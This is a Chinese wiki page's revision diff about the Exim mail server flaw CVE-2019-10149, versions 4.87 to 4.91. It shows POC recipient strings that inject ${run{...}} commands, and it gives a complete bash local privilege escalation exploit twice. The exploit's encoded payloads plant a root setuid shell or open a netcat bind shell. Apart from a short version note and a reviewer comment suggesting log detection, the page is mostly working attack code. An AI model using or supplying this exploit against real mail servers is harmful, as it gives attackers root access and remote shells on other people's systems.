Difference between revisions of "CVE-2019-10149 Exim郵箱服務漏洞"
(Created page with "<languages /> ==POC== <pre> 'RCPT TO "${run{...}}@relaydomain.com"' </pre> <pre> noob+${run{/usr/bin/touch /tmp/hello}}@myserver.com </pre>") |
| (2 intermediate revisions by 2 users not shown) | |||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
| + | |||
| + | == '''影響範圍''' == | ||
| + | Exim 版本 4.87 至 4.91 | ||
| + | |||
==POC== | ==POC== | ||
<pre> | <pre> | ||
| Line 9: | Line 13: | ||
noob+${run{/usr/bin/touch /tmp/hello}}@myserver.com | noob+${run{/usr/bin/touch /tmp/hello}}@myserver.com | ||
</pre> | </pre> | ||
| + | |||
| + | |||
| + | ==EXP== | ||
| + | <pre> | ||
| + | #!/bin/bash | ||
| + | |||
| + | # | ||
| + | # raptor_exim_wiz - "The Return of the WIZard" LPE exploit | ||
| + | # Copyright (c) 2019 Marco Ivaldi <[email protected]> | ||
| + | # | ||
| + | # A flaw was found in Exim versions 4.87 to 4.91 (inclusive). | ||
| + | # Improper validation of recipient address in deliver_message() | ||
| + | # function in /src/deliver.c may lead to remote command execution. | ||
| + | # (CVE-2019-10149) | ||
| + | # | ||
| + | # This is a local privilege escalation exploit for "The Return | ||
| + | # of the WIZard" vulnerability reported by the Qualys Security | ||
| + | # Advisory team. | ||
| + | # | ||
| + | # Credits: | ||
| + | # Qualys Security Advisory team (kudos for your amazing research!) | ||
| + | # Dennis 'dhn' Herrmann (/dev/tcp technique) | ||
| + | # | ||
| + | # Usage (setuid method): | ||
| + | # $ id | ||
| + | # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] | ||
| + | # $ ./raptor_exim_wiz -m setuid | ||
| + | # Preparing setuid shell helper... | ||
| + | # Delivering setuid payload... | ||
| + | # [...] | ||
| + | # Waiting 5 seconds... | ||
| + | # -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned | ||
| + | # # id | ||
| + | # uid=0(root) gid=0(root) groups=0(root) | ||
| + | # | ||
| + | # Usage (netcat method): | ||
| + | # $ id | ||
| + | # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] | ||
| + | # $ ./raptor_exim_wiz -m netcat | ||
| + | # Delivering netcat payload... | ||
| + | # Waiting 5 seconds... | ||
| + | # localhost [127.0.0.1] 31337 (?) open | ||
| + | # id | ||
| + | # uid=0(root) gid=0(root) groups=0(root) | ||
| + | # | ||
| + | # Vulnerable platforms: | ||
| + | # Exim 4.87 - 4.91 | ||
| + | # | ||
| + | # Tested against: | ||
| + | # Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz] | ||
| + | # | ||
| + | |||
| + | METHOD="setuid" # default method | ||
| + | PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost' | ||
| + | PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost' | ||
| + | |||
| + | # usage instructions | ||
| + | function usage() | ||
| + | { | ||
| + | echo "$0 [-m METHOD]" | ||
| + | echo | ||
| + | echo "-m setuid : use the setuid payload (default)" | ||
| + | echo "-m netcat : use the netcat payload" | ||
| + | echo | ||
| + | exit 1 | ||
| + | } | ||
| + | |||
| + | # payload delivery | ||
| + | function exploit() | ||
| + | { | ||
| + | # connect to localhost:25 | ||
| + | exec 3<>/dev/tcp/localhost/25 | ||
| + | |||
| + | # deliver the payload | ||
| + | read -u 3 && echo $REPLY | ||
| + | echo "helo localhost" >&3 | ||
| + | read -u 3 && echo $REPLY | ||
| + | echo "mail from:<>" >&3 | ||
| + | read -u 3 && echo $REPLY | ||
| + | echo "rcpt to:<$PAYLOAD>" >&3 | ||
| + | read -u 3 && echo $REPLY | ||
| + | echo "data" >&3 | ||
| + | read -u 3 && echo $REPLY | ||
| + | for i in {1..31} | ||
| + | do | ||
| + | echo "Received: $i" >&3 | ||
| + | done | ||
| + | echo "." >&3 | ||
| + | read -u 3 && echo $REPLY | ||
| + | echo "quit" >&3 | ||
| + | read -u 3 && echo $REPLY | ||
| + | } | ||
| + | |||
| + | # print banner | ||
| + | echo | ||
| + | echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit' | ||
| + | echo 'Copyright (c) 2019 Marco Ivaldi <[email protected]>' | ||
| + | echo | ||
| + | |||
| + | # parse command line | ||
| + | while [ ! -z "$1" ]; do | ||
| + | case $1 in | ||
| + | -m) shift; METHOD="$1"; shift;; | ||
| + | * ) usage | ||
| + | ;; | ||
| + | esac | ||
| + | done | ||
| + | if [ -z $METHOD ]; then | ||
| + | usage | ||
| + | fi | ||
| + | |||
| + | # setuid method | ||
| + | if [ $METHOD = "setuid" ]; then | ||
| + | |||
| + | # prepare a setuid shell helper to circumvent bash checks | ||
| + | echo "Preparing setuid shell helper..." | ||
| + | echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c | ||
| + | gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null | ||
| + | if [ $? -ne 0 ]; then | ||
| + | echo "Problems compiling setuid shell helper, check your gcc." | ||
| + | echo "Falling back to the /bin/sh method." | ||
| + | cp /bin/sh /tmp/pwned | ||
| + | fi | ||
| + | echo | ||
| + | |||
| + | # select and deliver the payload | ||
| + | echo "Delivering $METHOD payload..." | ||
| + | PAYLOAD=$PAYLOAD_SETUID | ||
| + | exploit | ||
| + | echo | ||
| + | |||
| + | # wait for the magic to happen and spawn our shell | ||
| + | echo "Waiting 5 seconds..." | ||
| + | sleep 5 | ||
| + | ls -l /tmp/pwned | ||
| + | /tmp/pwned | ||
| + | |||
| + | # netcat method | ||
| + | elif [ $METHOD = "netcat" ]; then | ||
| + | |||
| + | # select and deliver the payload | ||
| + | echo "Delivering $METHOD payload..." | ||
| + | PAYLOAD=$PAYLOAD_NETCAT | ||
| + | exploit | ||
| + | echo | ||
| + | |||
| + | # wait for the magic to happen and spawn our shell | ||
| + | echo "Waiting 5 seconds..." | ||
| + | sleep 5 | ||
| + | nc -v 127.0.0.1 31337 | ||
| + | |||
| + | # print help | ||
| + | else | ||
| + | usage | ||
| + | fi | ||
| + | </pre> | ||
| + | |||
| + | == '''引用''' == | ||
| + | https://github.com/MNEMO-CERT/PoC--CVE-2019-10149_Exim/blob/master/PoC_CVE-2019-10149.py | ||
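Review bot: The 影響範圍 section added in the first hunk names the affected range 4.87–4.91 but gives no fixed release and no mitigation, so a reader cannot tell from this page what to upgrade to; add a line such as `已修復版本：<FIRST_FIXED_RELEASE>` together with a link to the vendor advisory. The EXP section's own header describes the script as a local privilege escalation and it connects to `/dev/tcp/localhost/25`, so the page should say that this EXP requires an existing local account on the Exim host rather than leaving the impression, from the POC lines, that the same script works remotely. For defenders, the `${run{` sequence in the recipient local part (visible in both POC lines and in the two PAYLOAD_ variables) is a log indicator; a short 檢測 section suggesting a search of Exim mail logs for that string would make the page useful beyond exploitation. The 引用 link points to a Python PoC that is not the bash EXP shown above, so label it as a separate implementation.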
Latest revision as of 23:05, 6 April 2021
影響範圍
Exim 版本 4.87 至 4.91
POC
'RCPT TO "${run{...}}@relaydomain.com"'
noob+${run{/usr/bin/touch /tmp/hello}}@myserver.com
EXP
#!/bin/bash # # raptor_exim_wiz - "The Return of the WIZard" LPE exploit # Copyright (c) 2019 Marco Ivaldi <[email protected]> # # A flaw was found in Exim versions 4.87 to 4.91 (inclusive). # Improper validation of recipient address in deliver_message() # function in /src/deliver.c may lead to remote command execution. # (CVE-2019-10149) # # This is a local privilege escalation exploit for "The Return # of the WIZard" vulnerability reported by the Qualys Security # Advisory team. # # Credits: # Qualys Security Advisory team (kudos for your amazing research!) # Dennis 'dhn' Herrmann (/dev/tcp technique) # # Usage (setuid method): # $ id # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] # $ ./raptor_exim_wiz -m setuid # Preparing setuid shell helper... # Delivering setuid payload... # [...] # Waiting 5 seconds... # -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned # # id # uid=0(root) gid=0(root) groups=0(root) # # Usage (netcat method): # $ id # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] # $ ./raptor_exim_wiz -m netcat # Delivering netcat payload... # Waiting 5 seconds... # localhost [127.0.0.1] 31337 (?) 
open # id # uid=0(root) gid=0(root) groups=0(root) # # Vulnerable platforms: # Exim 4.87 - 4.91 # # Tested against: # Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz] # METHOD="setuid" # default method PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost' PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost' # usage instructions function usage() { echo "$0 [-m METHOD]" echo echo "-m setuid : use the setuid payload (default)" echo "-m netcat : use the netcat payload" echo exit 1 } # payload delivery function exploit() { # connect to localhost:25 exec 3<>/dev/tcp/localhost/25 # deliver the payload read -u 3 && echo $REPLY echo "helo localhost" >&3 read -u 3 && echo $REPLY echo "mail from:<>" >&3 read -u 3 && echo $REPLY echo "rcpt to:<$PAYLOAD>" >&3 read -u 3 && echo $REPLY echo "data" >&3 read -u 3 && echo $REPLY for i in {1..31} do echo "Received: $i" >&3 done echo "." >&3 read -u 3 && echo $REPLY echo "quit" >&3 read -u 3 && echo $REPLY } # print banner echo echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit' echo 'Copyright (c) 2019 Marco Ivaldi <[email protected]>' echo # parse command line while [ ! -z "$1" ]; do case $1 in -m) shift; METHOD="$1"; shift;; * ) usage ;; esac done if [ -z $METHOD ]; then usage fi # setuid method if [ $METHOD = "setuid" ]; then # prepare a setuid shell helper to circumvent bash checks echo "Preparing setuid shell helper..." echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null if [ $? -ne 0 ]; then echo "Problems compiling setuid shell helper, check your gcc." echo "Falling back to the /bin/sh method." cp /bin/sh /tmp/pwned fi echo # select and deliver the payload echo "Delivering $METHOD payload..." PAYLOAD=$PAYLOAD_SETUID exploit echo # wait for the magic to happen and spawn our shell echo "Waiting 5 seconds..." 
sleep 5 ls -l /tmp/pwned /tmp/pwned # netcat method elif [ $METHOD = "netcat" ]; then # select and deliver the payload echo "Delivering $METHOD payload..." PAYLOAD=$PAYLOAD_NETCAT exploit echo # wait for the magic to happen and spawn our shell echo "Waiting 5 seconds..." sleep 5 nc -v 127.0.0.1 31337 # print help else usage fi